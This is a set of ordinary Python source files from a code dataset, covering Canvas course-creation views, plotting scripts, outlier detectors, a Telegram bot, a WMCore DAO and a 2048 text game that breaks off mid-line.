logged_in_user_id\n if not created_by_user_id:\n created_by_user_id = \"canvas_user_id:%s\" % canvas_user_id\n\n create_bulk_job_kwargs = {\n 'school_id': school_id,\n 'sis_term_id': int(term),\n 'sis_department_id': int(department) if department else None,\n 'sis_course_group_id': int(course_group) if course_group else None,\n 'template_canvas_course_id': template_canvas_course_id,\n 'created_by_user_id': created_by_user_id,\n 'course_instance_ids': data['course_instance_ids']\n }\n\n bulk_job = BulkCanvasCourseCreationJob.objects.create_bulk_job(**create_bulk_job_kwargs)\n\n return redirect('bulk_site_creation:bulk_job_detail', bulk_job.id)\n\n\n@login_required\n@has_account_permission(canvas_api_accounts.ACCOUNT_PERMISSION_MANAGE_COURSES)\n@require_http_methods(['GET'])\ndef bulk_job_detail(request, bulk_job_id):\n bulk_job = BulkCanvasCourseCreationJob.objects.get(id=bulk_job_id)\n bulk_job_complete = bulk_job.status in (\n BulkCanvasCourseCreationJob.STATUS_NOTIFICATION_SUCCESSFUL,\n BulkCanvasCourseCreationJob.STATUS_NOTIFICATION_FAILED\n )\n course_job_summary = get_course_job_summary_data(bulk_job.id)\n\n school = School.objects.get(school_id=bulk_job.school_id)\n term = Term.objects.get(term_id=bulk_job.sis_term_id)\n\n department = None\n if bulk_job.sis_department_id:\n department = Department.objects.get(department_id=bulk_job.sis_department_id).name\n\n course_group = None\n if bulk_job.sis_course_group_id:\n course_group = 
CourseGroup.objects.get(course_group_id=bulk_job.sis_course_group_id).name\n\n template = get_canvas_site_template(school.school_id, bulk_job.template_canvas_course_id)\n\n return render(request, 'bulk_site_creation/bulk_job_detail.html', {\n 'bulk_job': bulk_job,\n 'bulk_job_complete': bulk_job_complete,\n 'school': school.title_short,\n 'term': term.display_name,\n 'department': department,\n 'course_group': course_group,\n 'template': template,\n 'course_jobs_total': course_job_summary['recordsTotal'],\n 'course_jobs_complete': course_job_summary['recordsComplete'],\n 'course_jobs_successful': course_job_summary['recordsSuccessful'],\n 'course_jobs_failed': course_job_summary['recordsFailed']\n })\n","sub_path":"bulk_site_creation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"334595092","text":"import ast\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n#plt.rcParams.update({'font.size': 16})\n\n\ngen_runs = {1:49, 2:34, 3:40, 4:39, 5:31, 6:36, 7:43, 8:35, 9:37, 10:31}\n\nfor gens in [30, 35, 40]:\n p_desc_runs = []\n for run in range(1,11):\n if gen_runs[run] < gens:\n continue\n if run == 9:\n continue \n \n ids_gen = pd.read_csv(f'gids/gen_ids_r{run}.csv') \n p_desc = pd.read_csv(f'pheno/desc_phen_r{run}.csv')\n \n cols = p_desc.columns.values\n \n pdesc_gens = []\n \n for g in range(gens):\n ids = ast.literal_eval(ids_gen[ids_gen['generation']==g]['robot_ids'].values[0])\n avg_gen = p_desc[p_desc['robot_id'].isin(ids)].mean()\n pdesc_gens.append(avg_gen)\n \n p_desc_runs.append(pdesc_gens)\n for col in cols:\n if col == 'robot_id':\n continue\n values = []\n for gen in range(gens):\n gen_vals = []\n for run in range(len(p_desc_runs)):\n gen_vals.append(p_desc_runs[run][gen][col])\n values.append(np.mean(gen_vals))\n\n col = 'length' if col == 'height' else col\n plt.plot(values, linewidth=3)\n plt.xlabel(\"Generation\")\n ylabel = col.capitalize().replace('_', ' ')\n plt.ylabel(ylabel)\n plt.savefig(f'avg_avg_{col}_gens_{gens}.png', bbox_inches='tight')\n plt.clf()\n","sub_path":"Scripts/Evolution and learning/learned_pheno.py","file_name":"learned_pheno.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"645025464","text":"# Import libraries\nimport datetime\nimport matplotlib as mp\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport os\n\n# Specify directories\nworking_directory = ['bin/iverson-2d-experiment/']\n# Input Files\ninput_filename_prefix = 'particles'\ninput_filename_suffix = '000.h5'\n\n# Add input\nntime = 126\ndt = 0.001\npoint_id = [0];\n\n# Preallocate variables\ntime = np.zeros((ntime + 1, 1))\ncoord = np.zeros((ntime + 1, len(working_directory)))\n\nfor k in range(0, len(working_directory), 1):\n\n\t# Output files\n\toutput_directory = working_directory[k] + 'results/'\n\toutput_prefix_filename = 'stress'\n\toutput_suffix_filename = '.vtp'\n\tif not os.path.exists(output_directory):\n\t\tos.makedirs(output_directory)\n\tprint(\"directory of files: \" + output_directory)\n\t\n\t# Loop all the .h5 files\n\tfor index in range(0, ntime + 1, 1):\n\t\n\t\t# Index multiplication\n\t\t#f k < 2:\n\t\t#\tmultiplication = 1\n\t\t#elif k < 4:\n\t\t#\tmultiplication = 2\n\t\t#else:\n\t\t#\tmultiplication = 4\n\t\tmultiplication = 1\n\t\tindex_mult = index * multiplication;\n\n\t\t# Prefix 
number of input file\n\t\tif index_mult < 10:\n\t\t\tzeros = '000'\n\t\telif index_mult < 100:\n\t\t\tzeros = '00'\n\t\telse:\n\t\t\tzeros = '0'\n\n\t\t# Concatenate filename\n\t\tinput_filename = working_directory[k] + input_filename_prefix + zeros + str(index_mult) + input_filename_suffix\n\t\toutput_filename = output_directory + output_prefix_filename + str(index_mult)\n\t\n\t\t# Read HDF5 - df refers to DataFrame\n\t\tdf = pd.read_hdf(input_filename)\n\t\n\t\t# Make np.array\n\t\tcoord_x = np.array(df['coord_x'])\n\t\tcoord_y = np.array(df['coord_y'])\n\t\t#coord_z = np.array(df['coord_z'])\n\t\t#stress_xx = np.array(df['stress_xx'])\n\t\t#stress_yy = np.array(df['stress_yy'])\n\t\t#stress_zz = np.array(df['stress_zz'])\n\t\t#tau_xy = np.array(df['tau_xy'])\n\t\t#strain_xx = np.array(df['strain_xx'])\n\t\t#strain_yy = np.array(df['strain_yy'])\n\t\t#strain_zz = np.array(df['strain_zz'])\n\t\n\t\t# Make data to store\n\t\t#for j in range(0, len(coord_x), 1):\n\t\t\t#coord[index, k] = max(coord_x[point_id[j]]\t\n\t\tcoord[index, k] = max(coord_x)\n\n\t\t# Prompt to make sure it's OK\n\t\tprint(input_filename + \" has been read at \" + str(datetime.datetime.now()))\n\t\n\t\t# Update time\n\t\ttime[index] = index * dt\n\t\n\t\t# Update index for next time step\n\t\tindex += 1\n\n\ncoord_save = np.zeros((50, 1))\nfor i in range(0, 12, 1):\n\tcoord_save[i, 0] = coord[i * 10, 0]\n\nnp.savetxt('data.csv', coord_save, delimiter=',')\n\n# Plot\nline1, = plt.plot(time, coord[:, [0]] * 100, 'r', label='USF Case 1')\n#line2, = plt.plot(time, stress[:, [1]], 'c--', label='USL Case 1')\n#line3, = plt.plot(time, stress[:, [2]], 'g', label='USF Case 2')\n#line4, = plt.plot(time, stress[:, [3]], 'm--', label='USL Case 2')\n#line5, = plt.plot(time, stress[:, [4]], 'g', label='USF Case 3')\n#line6, = plt.plot(time, stress[:, [5]], 'y--', label='USL Case 3')\n#plt.axis([0, 0.20, -3000, 0])\nplt.xlabel('Time (s)')\nplt.ylabel('Location in longitudinal direction (cm)')\n#plt.legend(handles=[line1, line2, line3, line4, line5, line6])\nplt.show()\n\n\n","sub_path":"hdf5_time_coord.py","file_name":"hdf5_time_coord.py","file_ext":"py","file_size_in_byte":2958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"105836483","text":"from pymongo import MongoClient\nimport requests\nimport io, json\nimport time\nimport datetime\nimport pprint\n\nclient = MongoClient()\nurf_db = client['urf_data']\nmatches = urf_db['urf_matches']\n\nmatches_in_db = []\n\ntest_match = \"1792078510\"\n\nMEJAIS_ID = \"3041\"\npp = pprint.PrettyPrinter(indent=4)\ndef populateMatchesInDB():\n\tglobal matches\n\tglobal matches_in_db\n\tfor match in matches.find():\n\t\tmatches_in_db.append(match['matchId'])\n\ndef pprintMatch(match_id):\n\tglobal matches\n\tfor match in matches.find():\n\t\tif match_id == str(match['matchId']):\n\t\t\tprint(wasMejaisBought(match))\n\t\t\treturn True\n\ndef ppTime(timestamp):\n\ttotal_seconds = int(timestamp) / 1000\n\tminutes = str(total_seconds / 60).zfill(2)\n\tseconds = str(total_seconds % 60).zfill(2)\n\treturn (\"{0}:{1}\".format(minutes, seconds))\n\ndef wasMejaisBought(match):\n\ttimeline_frames = match[\"timeline\"][\"frames\"]\n\tprint(len(timeline_frames))\n\tfor frame in timeline_frames:\n\t\tif \"events\" in frame:\n\t\t\tfor event in frame[\"events\"]:\n\t\t\t\tif event[\"eventType\"] == \"ITEM_PURCHASED\":\n\t\t\t\t\t\tif MEJAIS_ID == str(event[\"itemId\"]):\n\t\t\t\t\t\t\tprint(\"{0} bought {1} at {2}\".format(str(event[\"participantId\"]).zfill(2), 
event[\"itemId\"], ppTime(event[\"timestamp\"])))\n\t\t\t\t\t\t\treturn True\n\treturn False\n\npprintMatch(test_match)\n","sub_path":"urf_match_analyzer.py","file_name":"urf_match_analyzer.py","file_ext":"py","file_size_in_byte":1257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"313556142","text":"# -*- coding: utf-8 -*-\n#\n# This file is part of Invenio.\n# Copyright (C) 2016-2021 CERN.\n#\n# Invenio is free software; you can redistribute it and/or modify it\n# under the terms of the MIT License; see LICENSE file for more details.\n\n\"\"\"API views.\"\"\"\n\nfrom flask import Blueprint\n\n\ndef create_communities_api_blueprint(app):\n \"\"\"Create communities api blueprint.\"\"\"\n ext = app.extensions[\"invenio-communities\"]\n # control blueprint endpoints registration\n if app.config[\"COMMUNITIES_ENABLED\"]:\n return ext.communities_resource.as_blueprint()\n else:\n # return dummy blueprint\n return Blueprint(\n \"invenio_communities_api\",\n __name__,\n )\n","sub_path":"invenio_communities/views/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"491680326","text":"import numpy as np\nimport scipy as sp\nfrom sklearn.cluster import affinity_propagation\nfrom sklearn.covariance import GraphLasso\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.neighbors import KernelDensity\nfrom sklearn.utils import check_array\nfrom sklearn.utils.validation import check_is_fitted\n\nfrom ..base import BaseDetector\nfrom ..utils import timeit, Axes, OneDimArray, TwoDimArray\nfrom ..visualization import plot_graphical_model, plot_partial_corrcoef\n\n__all__ = ['GMM', 'KDE', 'SparseStructureLearning']\n\n\nclass GMM(BaseDetector):\n \"\"\"Outlier detector using Gaussian Mixture Models (GMMs).\n\n Parameters\n ----------\n contamination : float, default 0.01\n Amount of contamination of the data set, i.e. the proportion of\n outliers in the data set. 
Used to define the threshold.\n\n verbose : bool, default False\n Enable verbose output.\n\n gmm_params : dict, default None\n Other keywords passed to sklearn.mixture.GaussianMixture().\n\n Attributes\n ----------\n converged_ : bool\n True when convergence was reached in fit(), False otherwise.\n\n covariances_ : array-like\n Covariance of each mixture component.\n\n lower_bound_ : float\n Log-likelihood of the best fit of EM.\n\n means_ : array-like of shape (n_components, n_features)\n Mean of each mixture component.\n\n n_iter_ : int\n Number of step used by the best fit of EM to reach the convergence.\n\n precisions_ : array-like\n Precision matrices for each component in the mixture.\n\n precisions_cholesky_ : array-like\n Cholesky decomposition of the precision matrices of each mixture\n component.\n\n threshold_ : float\n Threshold.\n\n weights_ : array-like of shape (n_components,)\n Weights of each mixture components.\n\n X_ : array-like of shape (n_samples, n_features)\n Training data.\n \"\"\"\n\n @property\n def converged_(self) -> bool:\n return self._gmm.converged_\n\n @property\n def covariances_(self) -> OneDimArray:\n return self._gmm.covariances_\n\n @property\n def lower_bound_(self) -> float:\n return self._gmm.lower_bound_\n\n @property\n def means_(self) -> OneDimArray:\n return self._gmm.means_\n\n @property\n def n_iter_(self) -> int:\n return self._gmm.n_iter_\n\n @property\n def precisions_(self) -> OneDimArray:\n return self._gmm.precisions_\n\n @property\n def precisions_cholesky_(self) -> OneDimArray:\n return self._gmm.precisions_cholesky_\n\n @property\n def weights_(self) -> OneDimArray:\n return self._gmm.weights_\n\n def __init__(\n self,\n contamination: float = 0.01,\n verbose: bool = False,\n gmm_params: dict = None\n ) -> None:\n super().__init__(contamination=contamination, verbose=verbose)\n\n self.gmm_params = gmm_params\n\n def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n \"\"\"Check validity of parameters and raise ValueError if not valid.\"\"\"\n\n super().check_params(X)\n\n @timeit\n def fit(self, X: TwoDimArray, y: OneDimArray = None) -> 'GMM':\n \"\"\"Fit the model according to the given training data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Training data.\n\n y : ignored\n\n Returns\n -------\n self : GMM\n Return self.\n \"\"\"\n\n self.check_params(X)\n\n self.X_ = check_array(X)\n\n if self.gmm_params is None:\n gmm_params = {}\n else:\n gmm_params = self.gmm_params\n\n self._gmm = GaussianMixture(**gmm_params).fit(X)\n\n self.threshold_ = np.percentile(\n self.anomaly_score(), 100. * (1. - self.contamination)\n )\n\n return self\n\n def anomaly_score(self, X: TwoDimArray = None) -> OneDimArray:\n \"\"\"Compute the anomaly score for each sample.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features), default None\n Data. 
If not provided, the anomaly score for each training sample\n is returned.\n\n Returns\n -------\n anomaly_score : array-like of shape (n_samples,)\n Anomaly score for each sample.\n \"\"\"\n\n check_is_fitted(self, '_gmm')\n\n if X is None:\n X = self.X_\n\n return -self._gmm.score_samples(X)\n\n def score(self, X: TwoDimArray, y: OneDimArray = None) -> float:\n \"\"\"Compute the mean log-likelihood of the given data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Data.\n\n y : ignored.\n\n Returns\n -------\n score : float\n Mean log-likelihood of the given data.\n \"\"\"\n\n check_is_fitted(self, '_gmm')\n\n return self._gmm.score(X)\n\n\nclass KDE(BaseDetector):\n \"\"\"Outlier detector using Kernel Density Estimation (KDE).\n\n Parameters\n ----------\n contamination : float, default 0.01\n Amount of contamination of the data set, i.e. the proportion of\n outliers in the data set. Used to define the threshold.\n\n verbose : bool, default False\n Enable verbose output.\n\n kde_params : dict, default None\n Other keywords passed to sklearn.neighbors.KernelDensity().\n\n Attributes\n ----------\n threshold_ : float\n Threshold.\n\n X_ : array-like of shape (n_samples, n_features)\n Training data.\n \"\"\"\n\n @property\n def X_(self) -> TwoDimArray:\n return self._kde.tree_.data\n\n def __init__(\n self,\n contamination: float = 0.01,\n verbose: bool = False,\n kde_params: dict = None\n ) -> None:\n super().__init__(contamination=contamination, verbose=verbose)\n\n self.kde_params = kde_params\n\n def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n \"\"\"Check validity of parameters and raise ValueError if not valid.\"\"\"\n\n super().check_params(X)\n\n @timeit\n def fit(self, X: TwoDimArray, y: OneDimArray = None) -> 'KDE':\n \"\"\"Fit the model according to the given training data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Training data.\n\n y : ignored\n\n Returns\n -------\n self : KDE\n Return self.\n \"\"\"\n\n self.check_params(X)\n\n if self.kde_params is None:\n kde_params = {}\n else:\n kde_params = self.kde_params\n\n self._kde = KernelDensity(**kde_params).fit(X)\n\n self.threshold_ = np.percentile(\n self.anomaly_score(), 100. * (1. - self.contamination)\n )\n\n return self\n\n def anomaly_score(self, X: TwoDimArray = None) -> OneDimArray:\n \"\"\"Compute the anomaly score for each sample.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features), default None\n Data. If not provided, the anomaly score for each training sample\n is returned.\n\n Returns\n -------\n anomaly_score : array-like of shape (n_samples,)\n Anomaly score for each sample.\n \"\"\"\n\n check_is_fitted(self, '_kde')\n\n if X is None:\n X = self.X_\n\n return -self._kde.score_samples(X)\n\n def score(self, X: TwoDimArray, y: OneDimArray = None) -> float:\n \"\"\"Compute the mean log-likelihood of the given data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Data.\n\n y : ignored\n\n Returns\n -------\n score : float\n Mean log-likelihood of the given data.\n \"\"\"\n\n check_is_fitted(self, '_kde')\n\n return np.mean(self._kde.score_samples(X))\n\n\nclass SparseStructureLearning(BaseDetector):\n \"\"\"Outlier detector using sparse structure learning.\n\n Parameters\n ----------\n contamination : float, default 0.01\n Amount of contamination of the data set, i.e. the proportion of\n outliers in the data set. 
Used to define the threshold.\n\n    verbose : bool, default False\n        Enable verbose output.\n\n    apcluster_params : dict, default None\n        Other keywords passed to sklearn.cluster.affinity_propagation().\n\n    glasso_params : dict, default None\n        Other keywords passed to sklearn.covariance.GraphLasso().\n\n    Attributes\n    ----------\n    covariance_ : array-like of shape (n_features, n_features)\n        Estimated covariance matrix.\n\n    labels_ : array-like of shape (n_features,)\n        Label of each feature.\n\n    location_ : array-like of shape (n_features,)\n        Estimated location.\n\n    n_iter_ : int\n        Number of iterations run.\n\n    partial_corrcoef_ : array-like of shape (n_features, n_features)\n        Partial correlation coefficient matrix.\n\n    precision_ : array-like of shape (n_features, n_features)\n        Estimated pseudo inverse matrix.\n\n    threshold_ : float\n        Threshold.\n\n    X_ : array-like of shape (n_samples, n_features)\n        Training data.\n\n    References\n    ----------\n    T. Ide, C. Lozano, N. Abe and Y. Liu,\n    \"Proximity-based anomaly detection using sparse structure learning,\"\n    In Proceedings of SDM'09, pp. 97-108, 2009.\n    \"\"\"\n\n    @property\n    def covariance_(self) -> TwoDimArray:\n        return self._glasso.covariance_\n\n    @property\n    def labels_(self) -> OneDimArray:\n        if self.apcluster_params is None:\n            apcluster_params = {}\n        else:\n            apcluster_params = self.apcluster_params\n\n        # cluster using affinity propagation\n        _, labels = affinity_propagation(\n            self.partial_corrcoef_, **apcluster_params\n        )\n\n        return labels\n\n    @property\n    def location_(self) -> OneDimArray:\n        return self._glasso.location_\n\n    @property\n    def n_iter_(self) -> int:\n        return self._glasso.n_iter_\n\n    @property\n    def partial_corrcoef_(self) -> TwoDimArray:\n        n_features, _ = self.precision_.shape\n        diag = np.diag(self.precision_)[np.newaxis]\n        partial_corrcoef = - self.precision_ / np.sqrt(diag.T @ diag)\n        partial_corrcoef.flat[::n_features + 1] = 1.\n\n        return partial_corrcoef\n\n    @property\n    def precision_(self) -> TwoDimArray:\n        return self._glasso.precision_\n\n    def __init__(\n        self,\n        contamination: float = 0.01,\n        verbose: bool = False,\n        apcluster_params: dict = None,\n        glasso_params: dict = None\n    ) -> None:\n        super().__init__(contamination=contamination, verbose=verbose)\n\n        self.apcluster_params = apcluster_params\n        self.glasso_params = glasso_params\n\n    def check_params(self, X: TwoDimArray, y: OneDimArray = None) -> None:\n        \"\"\"Check validity of parameters and raise ValueError if not valid.\"\"\"\n\n        super().check_params(X)\n\n    @timeit\n    def fit(\n        self,\n        X: TwoDimArray,\n        y: OneDimArray = None\n    ) -> 'SparseStructureLearning':\n        \"\"\"Fit the model according to the given training data.\n\n        Parameters\n        ----------\n        X : array-like of shape (n_samples, n_features)\n            Training data.\n\n        y : ignored\n\n        Returns\n        -------\n        self : SparseStructureLearning\n            Return self.\n        \"\"\"\n\n        self.check_params(X)\n\n        self.X_ = check_array(X)\n\n        if self.glasso_params is None:\n            glasso_params = {}\n        else:\n            glasso_params = self.glasso_params\n\n        self._glasso = GraphLasso(**glasso_params).fit(X)\n\n        df, loc, scale = sp.stats.chi2.fit(self.anomaly_score())\n        self.threshold_ = sp.stats.chi2.ppf(\n            1.0 - self.contamination, df, loc, scale\n        )\n\n        return self\n\n    def anomaly_score(self, X: TwoDimArray = None) -> OneDimArray:\n        \"\"\"Compute the anomaly score for each sample.\n\n        Parameters\n        ----------\n        X : array-like of shape (n_samples, n_features), default None\n            Data. 
If not provided, the anomaly score for each training sample\n is returned.\n\n Returns\n -------\n anomaly_score : array-like of shape (n_samples,)\n Anomaly score for each sample.\n \"\"\"\n\n check_is_fitted(self, '_glasso')\n\n if X is None:\n X = self.X_\n else:\n X = check_array(X)\n\n return self._glasso.mahalanobis(X)\n\n def featurewise_anomaly_score(self, X: TwoDimArray = None) -> TwoDimArray:\n \"\"\"Compute the feature-wise anomaly scores for each sample.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features), default None\n Data. If not provided, the feature-wise anomaly scores for each\n training sample are returned.\n\n Returns\n -------\n anomaly_score : array-like of shape (n_samples, n_features)\n Feature-wise anomaly scores for each sample.\n \"\"\"\n\n check_is_fitted(self, '_glasso')\n\n if X is None:\n X = self.X_\n\n return 0.5 * np.log(\n 2. * np.pi / np.diag(self.precision_)\n ) + 0.5 / np.diag(\n self.precision_\n ) * ((X - self.location_) @ self.precision_) ** 2\n\n def score(self, X: TwoDimArray, y: OneDimArray = None) -> float:\n \"\"\"Compute the mean log-likelihood of the given data.\n\n Parameters\n ----------\n X : array-like of shape (n_samples, n_features)\n Data.\n\n y : ignored\n\n Returns\n -------\n score : float\n Mean log-likelihood of the given data.\n \"\"\"\n\n check_is_fitted(self, '_glasso')\n\n return self._glasso.score(X)\n\n def plot_graphical_model(self, **kwargs) -> Axes:\n \"\"\"Plot the Gaussian Graphical Model (GGM).\n\n Parameters\n ----------\n ax : matplotlib Axes, default None\n Target axes instance.\n\n title : string, default 'Graphical model'\n Axes title. To disable, pass None.\n\n filepath : str, default None\n If not None, save the current figure.\n\n **kwargs : dict\n Other keywords passed to nx.draw_networkx().\n\n Returns\n -------\n ax : matplotlib Axes\n Axes on which the plot was drawn.\n \"\"\"\n\n kwargs['node_color'] = self.labels_\n\n return plot_graphical_model(self.partial_corrcoef_, **kwargs)\n\n def plot_partial_corrcoef(self, **kwargs) -> Axes:\n \"\"\"Plot the partial correlation coefficient matrix.\n\n Parameters\n ----------\n ax : matplotlib Axes, default None\n Target axes instance.\n\n cmap : matplotlib Colormap, default None\n If None, plt.cm.RdYlBu is used.\n\n vmin : float, default -1.0\n Used in conjunction with norm to normalize luminance data.\n\n vmax : float, default 1.0\n Used in conjunction with norm to normalize luminance data.\n\n cbar : bool, default True.\n Whether to draw a colorbar.\n\n title : string, default 'Partial correlation'\n Axes title. 
To disable, pass None.\n\n        filepath : str, default None\n            If not None, save the current figure.\n\n        **kwargs : dict\n            Other keywords passed to ax.imshow().\n\n        Returns\n        -------\n        ax : matplotlib Axes\n            Axes on which the plot was drawn.\n        \"\"\"\n\n        return plot_partial_corrcoef(self.partial_corrcoef_, **kwargs)\n","sub_path":"kenchi/outlier_detection/statistical.py","file_name":"statistical.py","file_ext":"py","file_size_in_byte":15688,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"279952364","text":"import locale\nimport logging\n\nimport command\nfrom redacted import BOT_TOKEN\n\n\nfrom telegram.ext import Updater, InlineQueryHandler, CommandHandler\n\n\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n                    level=logging.INFO)\n\nlogger = logging.getLogger(__name__)\n\ntry:\n    locale.setlocale(locale.LC_TIME, \"nl_NL.utf8\")\nexcept locale.Error:\n    locale.setlocale(locale.LC_TIME, \"nl_NL\")\n\n\n\ndef error(update, context):\n    \"\"\"Log Errors caused by Updates.\"\"\"\n    logger.warning('Update \"%s\" caused error \"%s\"', update, context.error)\n\n\ndef main():\n    \"\"\"Start the bot.\"\"\"\n    # Create the Updater and pass it your bot's token.\n    # Make sure to set use_context=True to use the new context based callbacks\n    # Post version 12 this will no longer be necessary\n    updater = Updater(BOT_TOKEN, use_context=True)\n\n    # Get the dispatcher to register handlers\n    dp = updater.dispatcher\n\n    # on different commands - answer in Telegram\n    for command_name, callback in command.commands.items():\n        dp.add_handler(CommandHandler(command_name, callback))\n    dp.add_handler(CommandHandler(\"help\", command.start))\n\n    # # on noncommand i.e message - echo the message on Telegram\n    # dp.add_handler(MessageHandler(Filters.text, noncommand.echo))\n    dp.add_handler(InlineQueryHandler(command.inlinequery))\n\n    # log all errors\n    dp.add_error_handler(error)\n\n    # Start the Bot\n    print(\"Listening...\")\n    updater.start_polling()\n    updater.idle()\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"409342403","text":"#!/usr/bin/env python\n\"\"\"\n_New_\n\nOracle implementation of Masks.New\n\"\"\"\n\nimport logging\n\nfrom WMCore.WMBS.MySQL.Masks.New import New as NewMasksMySQL\n\n__all__ = []\n\n\nclass New(NewMasksMySQL):\n    sql = NewMasksMySQL.sql\n\n    def getDictBinds(self, jobList, inclusivemask=True):\n        binds = []\n        for job in jobList:\n            if inclusivemask:\n                mask = 'Y'\n            else:\n                mask = 'N'\n            binds.append({'jobid': job['id'], 'inclusivemask': mask,\n                          'firstevent': job['mask']['FirstEvent'],\n                          'lastevent': job['mask']['LastEvent'],\n                          'firstrun': job['mask']['FirstRun'],\n                          'lastrun': job['mask']['LastRun'],\n                          'firstlumi': job['mask']['FirstLumi'],\n                          'lastlumi': job['mask']['LastLumi'], })\n\n        return binds\n\n    def execute(self, jobid=None, inclusivemask=None, conn=None,\n                transaction=False, jobList=None):\n\n        if jobList:\n            binds = self.getDictBinds(jobList, inclusivemask)\n            result = self.dbi.processData(self.sql, binds, conn=conn, transaction=transaction)\n            return self.format(result)\n\n        elif jobid:\n            if inclusivemask is None:\n                binds = self.getBinds(jobid=jobid, inclusivemask='Y')\n            else:\n                binds = self.getBinds(jobid=jobid, inclusivemask='N')\n\n            result = self.dbi.processData(self.plainsql, binds, conn=conn,\n                                          transaction=transaction)\n            return self.format(result)\n\n        
else:\n            logging.error('Masks.New asked to create Mask with no Job ID')\n            return\n","sub_path":"src/python/WMCore/WMBS/Oracle/Masks/New.py","file_name":"New.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"}
+{"seq_id":"322037202","text":"#\n# ISEL - LEIM - MDP - 2014/2015 - 1st Semester\n#\n# 2048 game in text mode\n#\n# Author: João Beleza Sousa & Andre Carvalho no.: 41839\n#\n# History:\n#\n# 2015/02/09 - Implementation of a 5x5 grid\n#\n# 2015/01/07 - Implementation of the \"debug\" function\n#\n# 2014/11/28 - Added the use of the manager. (class 07 - jbs)\n#\n# 2014/11/19 - Added the output of the score. (class 06 - jbs)\n#\n# 2014/11/12 - Added the 'a' key with a call to the esquerda function.\n#              (class 05 - jbs)\n#\n# 2014/11/12 - Fixed a bug in the print_grelha function. The row and column\n#              numbers were starting at zero. According to the specification\n#              they start at 1.\n#              (class 05 - Daniel Silveira Gomes n. 41599)\n\n\nfrom j2048_motor_41839 import novo_jogo\nfrom j2048_motor_41839 import valor\nfrom j2048_motor_41839 import terminou\nfrom j2048_motor_41839 import esquerda\nfrom j2048_motor_41839 import pontuacao\nfrom j2048_motor_41839 import direita\nfrom j2048_motor_41839 import acima\nfrom j2048_motor_41839 import abaixo\n\n# class 07\nfrom j2048_gestor_41839 import inicializa_semente\nfrom j2048_gestor_41839 import le_identificacao\nfrom j2048_gestor_41839 import regista_grelha\nfrom j2048_gestor_41839 import regista_jogada\nfrom j2048_gestor_41839 import regista_pontos\nfrom j2048_gestor_41839 import escreve_registo\n\n\n#Debug\nsemente_favorita = 344\n\nprint(\"2048 game\")\nprint(\"use the keys wasd\")\nprint(\"good luck!\")\n\ndef debug():\n    jogadas_1='=ddssswswsswdsdasssdsdwwaawdaasasssdawwdasasasddaawsaadwdswdswswdwdawdsswadwssdwsswwadwsdwswsawadddsawsadaddwdwwaasddddwdswwadswswsddwwdwdsdwdwswsawsdaadsdddwdwdswwwd'\n    # Turn the string above into a list\n    a_1 = list(jogadas_1)\n    \n    for i in range(len(list(jogadas_1))):\n        if a_1[i] == 'w':\n            print(\"MOVE:UP\")\n            acima()\n        \n        if a_1[i] == 's':\n            print(\"MOVE:DOWN\")\n            abaixo()\n        \n        if a_1[i] == 'a':\n            print(\"MOVE:LEFT\")\n            esquerda()\n        \n        if a_1[i] == 'd':\n            print(\"MOVE:RIGHT\")\n            direita()\n        \ndef ocupar_5_espacos(um_numero):\n\n    resultado = str(um_numero)\n    acrescentar = 5 - len(resultado)\n\n    if acrescentar > 0:\n        for n in range(acrescentar):\n            resultado = resultado + \" \"\n\n    return(resultado)\n\ndef print_grelha():\n\n    print(\"score = \" + str(pontuacao())) # class 06\n\n    for linha in[0, 1, 2, 3, 4]:\n        linha_string = \"\"\n        for coluna in [0, 1, 2, 3, 4]:\n            linha_string = linha_string \\\n                + ocupar_5_espacos(valor(linha + 1, coluna + 1)) + \" \"\n        print(linha_string)\n\ninicializa_semente(semente_favorita) # class 07\nnovo_jogo()\nprint_grelha()\n\nle_identificacao() # class 07\nregista_grelha(valor(1,1), valor(1,2), valor(1,3), valor(1,4), valor(1,5),\n               valor(2,1), valor(2,2), valor(2,3), valor(2,4), valor(2,5),\n               valor(3,1), valor(3,2), valor(3,3), valor(3,4), valor(3,5),\n               valor(4,1), valor(4,2), valor(4,3), valor(4,4), valor(4,5),\n               valor(5,1), valor(5,2), valor(5,3), valor(5,4), valor(5,5)) # class 07\nletra = None\n\nwhile letra != 'q' and not(terminou()):\n\n    letra = input()\n\n    if letra == 'n':\n        regista_pontos(pontuacao()) # class 07\n        escreve_registo() # class 07\n        inicializa_semente(semente_favorita) # class 07\n        novo_jogo()\n        regista_grelha(valor(1,1), valor(1,2), valor(1,3), valor(1,4), 
